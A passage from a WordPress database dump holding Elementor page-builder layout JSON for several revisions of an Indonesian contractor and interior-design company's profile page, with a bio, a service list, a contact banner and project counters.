fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Let\'s turn your ideas\\ninto reality\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":400},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Commercial\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Residential\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Office\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-building\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4110,4905,'_elementor_page_assets','a:1:{s:6:\"styles\";a:2:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";}}'),(4111,4905,'_elementor_pro_version','3.8.1'),(4112,4905,'_elementor_css','a:6:{s:4:\"time\";i:1695376247;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:8:\"fa-solid\";i:3;s:0:\"\";i:5;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4113,4906,'_wp_page_template','elementor_header_footer'),(4114,4906,'_elementor_edit_mode','builder'),(4115,4906,'_elementor_template_type','wp-page'),(4116,4906,'_elementor_version','3.8.1'),(4117,4906,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/file-1.jpg\",\"id\":4884,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Let\'s turn your ideas\\ninto reality\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":400},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Commercial\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Residential\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Office\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-building\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4118,4906,'_elementor_page_assets','a:1:{s:6:\"styles\";a:2:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";}}'),(4119,4906,'_elementor_pro_version','3.8.1'),(4120,4906,'_elementor_css','a:6:{s:4:\"time\";i:1695376247;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:8:\"fa-solid\";i:3;s:0:\"\";i:5;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4121,4907,'_wp_page_template','elementor_header_footer'),(4122,4907,'_elementor_edit_mode','builder'),(4123,4907,'_elementor_template_type','wp-page'),(4124,4907,'_elementor_version','3.8.1'),(4125,4907,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/file-1.jpg\",\"id\":4884,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai 